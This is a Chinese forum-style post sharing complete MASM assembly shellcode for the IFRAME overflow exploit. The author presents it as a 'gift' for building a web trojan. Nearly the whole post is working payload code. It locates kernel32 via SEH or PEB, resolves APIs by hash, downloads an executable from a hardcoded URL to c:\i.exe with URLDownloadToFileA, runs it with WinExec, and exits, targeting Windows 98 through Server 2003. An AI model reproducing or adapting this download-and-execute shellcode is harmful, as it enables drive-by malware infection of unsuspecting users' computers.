IFRAME溢出利用之shellcode

猪猪

作者：冰狐浪子   文章来源：冰狐浪子

网上关于可以溢出之后下载程序的shellcode不少，但基本上都是用于win2000 xp 2003等，可以用于win9x的我一时没有找到，因为要做这

个网页木马，就索性自己找代码和文章看了下，用了近两天的时间终于写了个可以运行于win98、winme、win2000、winxp以及win2003 server

的代码。希望对大家喜欢！算是给大家的新年礼物吧！希望大家以后多多来我的小站凑个热闹！

代码如下：

1. .386
   
2. .model flat, stdcall
   
3. option casemap :none
   
4. include windows.inc
   
5. include kernel32.inc
   
6. includelib kernel32.lib
   
7. ;***********************************************************************
   
8. debug equ 1 ;是否测试shellcode
   
9. SEHorPEB equ 1 ;利用SEH[1]或PEB[0]获取 kernel32.dll 的基地址
   
10. big equ 1 ;1=c:\i.exe 0=c:\i
    
11. PrTh equ 1 ;结束进程ExitProcess[1]或线程ExitThread[0]
    
12. 
    
13. Url equ db 'http://www.icyfoxlovelace.com/test.exe',0
    
14. HASH_KEY equ 13 ; HASH位移量
    
15. ;***********************************************************************
    
16. 
    
17. ;制作：冰狐浪子[icyfoxlovelace]{ EST }
    
18. ;主页：http://www.icyfoxlovelace.com
    
19. ;Q Q: 76416026
    
20. ;作用：下载运行并指定程序[为IFRAME溢出漏洞特别制作]
    
21. .code
    
22. ;=======================================================================
    
23. ;所调用的Api
    
24. ;=======================================================================
    
25. ApiSum equ 4 ; 所有Api数量
    
26. Api:
    
27. ;kernel32 3
    
28. db "LoadLibraryA",0 ; [esi]
    
29. db "WinExec",0 ; [esi+4]
    
30. IF PrTh
    
31. db "ExitProcess",0 ; [esi+8]
    
32. ELSE
    
33. db "ExitThread",0 ; [esi+8]
    
34. ENDIF
    
35. 
    
36. ;urlmon 1
    
37. db "URLDownloadToFileA",0 ; [esi+12]
    
38. 
    
39. ; Api别名 call dword ptr pLoadLibraryA
    
40. pLoadLibraryA equ [esi]
    
41. pWinExec equ [esi+4]
    
42. 
    
43. IF PrTh
    
44. pExitProcess equ [esi+8]
    
45. ELSE
    
46. pExitThread equ [esi+8]
    
47. ENDIF
    
48. 
    
49. pURLDownloadToFileA equ [esi+12]
    
50. ;=======================================================================
    
51. 
    
52. SCFile db "ShellCode.txt",0
    
53. SCFLen dd ?
    
54. 
    
55. start:
    
56. ;=======================================================================
    
57. ;获取所需Api的hash值并保存
    
58. ;=======================================================================
    
59. hash_start:
    
60. mov edi,offset ApiHash
    
61. mov esi,offset Api
    
62. mov ecx,ApiSum
    
63. hash_next:
    
64. xor   eax, eax
    
65. hash:
    
66. movzx   edx, byte ptr [esi]
    
67. cmp   dl, dh
    
68. jz     short save_addr
    
69. ror   eax, HASH_KEY ; hash key
    
70. add   eax, edx
    
71. inc   esi
    
72. jmp   short hash
    
73. save_addr:
    
74. stosd
    
75. inc esi
    
76. loop   hash_next
    
77. 
    
78. ;=======================================================================
    
79. ;把shellcode写入文件
    
80. ;=======================================================================
    
81. 
    
82. invoke CreateFile,addr SCFile,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,\
    
83.     FILE_ATTRIBUTE_NORMAL or FILE_FLAG_WRITE_THROUGH, NULL
    
84. mov ebx,eax
    
85. push NULL
    
86. push offset SCFLen
    
87. push ShellCode_Length
    
88. push offset ShellCodeStart
    
89. push ebx
    
90. call WriteFile
    
91. ;invoke WriteFile,HSCFile,addr ShellCodeStart,SCFLen, addr SCFLen, NULL
    
92. invoke CloseHandle,ebx
    
93. 
    
94. 
    
95. IF debug
    
96. jmp ShellCode ;测试ShellCode
    
97. ENDIF
    
98. invoke ExitProcess,0
    
99. 
    
100. ;=======================================================================
     
101. ;shellcode开始
     
102. ;利用SEH获取 kernel32.dll 的基地址
     
103. ;=======================================================================
     
104. ShellCodeStart equ this byte
     
105. ShellCode:
     
106. ;cld;最好加上这句,以防万一
     
107. assume fs:nothing
     
108. 
     
109. IF SEHorPEB
     
110. 
     
111. xor   esi,esi
     
112. lods   dword ptr fs:[esi] ;4字节等同于6字节mov eax,fs:[0]
     
113. 
     
114.   ;此处省略mov eax,[eax]，会使Search_Krnl32_lop循环增加一次，不影响实际应用
     
115. 
     
116. Search_Krnl32_lop:
     
117. inc eax
     
118. je Krnl32_Base_Ok
     
119. dec eax
     
120.     xchg esi,eax ; 等同于mov eax,[eax],但可以使下面的lodsd
     
121.     lodsd   ; xchg ebp,eax比{ mov ebp,[eax+4] }少一个字节
     
122.     jmp Search_Krnl32_lop
     
123. Krnl32_Base_Ok:
     
124. lodsd
     
125. xchg ebp,eax ;ebp=kernel32的UnhandledExceptionFilter地址
     
126. 
     
127. find_pe_header:
     
128. dec ebp ; 等同于ebp-010000h;sub ebp, 010000h
     
129. xor bp,bp ; kernel32 is 64k align
     
130.   ; 不用1000h是因为dll文件加载一般以64k（10000）为界
     
131. 
     
132. cmp word ptr [ebp],IMAGE_DOS_SIGNATURE ; "ZM"5A4Dh
     
133. jne find_pe_header
     
134. 
     
135. mov esi,ebp
     
136. add esi, [ebp][IMAGE_DOS_HEADER.e_lfanew]
     
137. cmp dword ptr [esi],IMAGE_NT_SIGNATURE ;"EP"00004550h;
     
138. jne find_pe_header
     
139. ELSE
     
140. ;***********************************************************************
     
141. ;通过peb取得kernel32.dll地址
     
142.     mov   eax, fs:[30h] ;PEB
     
143.     mov   eax, [eax+0ch] ;PROCESS_MODULE_INFO
     
144.     mov   esi, [eax+1ch] ;InInitOrder.flink
     
145.     lodsd   ;eax = InInitOrder.blink
     
146.     mov   ebp, [eax+08h] ;ebp = kernel32.dll base address
     
147. ;***********************************************************************
     
148. ENDIF
     
149. ;=======================================================================
     
150. ;到这里ebp = kernel32.dll 的基地址
     
151. ;=======================================================================
     
152. 
     
153. jmp sc_end
     
154. sc_start:      
     
155. pop edi   ;Api 的 Hash 值的保存地址 (esp -> edi)
     
156. mov esi, edi ;Api 的 Hash 值的保存地址 -> esi
     
157.   
     
158.   ;获取所需kernel32里Api的地址
     
159. push 3
     
160. pop ecx
     
161. getkernel32:
     
162. call GetProcAddress_fun
     
163. loop getkernel32
     
164. 
     
165.   ;利用堆栈加载urlmon.dll
     
166. push 00006e6fh ;0'no'
     
167. push 'mlru'   ;6d6c7275h urlmon
     
168. push esp
     
169. call dword ptr pLoadLibraryA ;LoadLibraryA("urlmon");
     
170.    
     
171. mov ebp, eax ;ebp = urlmon.dll base address
     
172.    
     
173. call GetProcAddress_fun ;获取urlmon.dll里的'URLDownloadToFileA'的地址
     
174. 
     
175.   ;现在edi=Url的地址
     
176. 
     
177. IF big
     
178.   ;URLDownloadToFileA下载程序
     
179. push 0
     
180. push 'exe.'   ;.exe;.bak 可以不要扩展名
     
181. push 'i\:c'   ;695c3a63h c:\i ;c:\i.exe
     
182. mov ebx,esp
     
183. 
     
184. xor eax, eax
     
185. push eax
     
186. push eax
     
187. push ebx   ;c:\i.exe
     
188. push edi   ;Url
     
189. push eax
     
190. call dword ptr pURLDownloadToFileA ;URLDownloadToFileA(Url,'c:\i.exe') 下载程序
     
191. 
     
192. ELSE
     
193. push 0
     
194. push 'i\:c'   ;695c3a63h c:\i
     
195. mov ebx,esp
     
196. 
     
197. xor   ecx, ecx
     
198. push   ecx
     
199. push   ecx
     
200. push   ebx   ;c:\i
     
201. push   edi   ;Url
     
202. push   ecx
     
203. call   eax   ;URLDownloadToFileA(Url,'c:\i') 下载程序
     
204. ENDIF
     
205. 
     
206.   ;WinExec运行程序
     
207. ;push eax   ;去掉,利用堆栈里的代替
     
208. push ebx
     
209. call dword ptr pWinExec ;WinExec(c:\i.exe);
     
210. 
     
211. IF PrTh
     
212.   ;结束进程ExitProcess
     
213. ;push 0   ;去掉,利用堆栈里的代替
     
214. call dword ptr pExitProcess
     
215. ELSE
     
216.   ;结束线程ExitThread
     
217. ;push 0   ;去掉,利用堆栈里的代替
     
218. call dword ptr pExitThread
     
219. ENDIF
     
220. 
     
221. ;=======================================================================
     
222. ;利用Hash得到Api地址
     
223. ;ebp=DLL的基地址
     
224. ;edi=Hash值地址和得到的Api的保存地址
     
225. ;=======================================================================
     
226. GetProcAddress_fun:   
     
227. push ecx
     
228. push esi
     
229. 
     
230. mov esi, [ebp+IMAGE_DOS_HEADER.e_lfanew]   ;e_lfanew 0x3C
     
231. mov esi, [esi+ebp+IMAGE_NT_HEADERS.OptionalHeader.DataDirectory] ;导出表ExportDirectory RVA 0x78
     
232. add esi, ebp     ;RVA2VA
     
233. push esi
     
234. mov esi, [esi+IMAGE_EXPORT_DIRECTORY.AddressOfNames] ;函数名地址表AddressOfNames RVA 0x20
     
235. add esi, ebp     ;RVA2VA
     
236. 
     
237. xor ecx, ecx
     
238. dec ecx
     
239. 
     
240. find_start:
     
241. inc ecx
     
242. lodsd
     
243. add eax, ebp
     
244. xor ebx, ebx
     
245. 
     
246. hash_loop:
     
247. movzx edx, byte ptr [eax] ;movsx edx, byte ptr [eax]
     
248. cmp dl, dh
     
249. jz short find_addr
     
250. ror ebx, HASH_KEY ;hash key
     
251. add ebx, edx
     
252. inc eax
     
253. jmp short hash_loop
     
254. 
     
255. find_addr:
     
256. cmp ebx, [edi] ;比较hash值
     
257. jnz short find_start
     
258. pop esi   ;ExportDirectory
     
259. mov ebx, [esi+IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals] ;API输出序号表AddressOfNameOrdinals RVA 0x24
     
260. add ebx, ebp     ;RVA2VA
     
261. movzx ecx, word ptr [ebx+ecx*2]   ;ecx=找到的Api的输出序号;mov cx, [ebx+ecx*2]
     
262. mov ebx, [esi+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions] ;API输出地址表AddressOfFunctions RVA 0x1C
     
263. add ebx, ebp ;RVA2VA
     
264. mov eax, [ebx+ecx*4] ;eax=Api入口地址的RVA
     
265. add eax, ebp ;RVA2VA
     
266. stosd   ;Api入口地址保存到 [edi]
     
267. 
     
268. pop esi
     
269. pop ecx
     
270. ret
     
271. 
     
272. sc_end:
     
273. call sc_start
     
274. 
     
275. ;=======================================================================
     
276. 
     
277. ApiHash dd ApiSum dup (?)
     
278. Url
     
279. ShellCodeEnd equ this byte
     
280. ShellCode_Length equ offset ShellCodeEnd-offset ShellCodeStart
     
281. 
     
282. end start

复制代码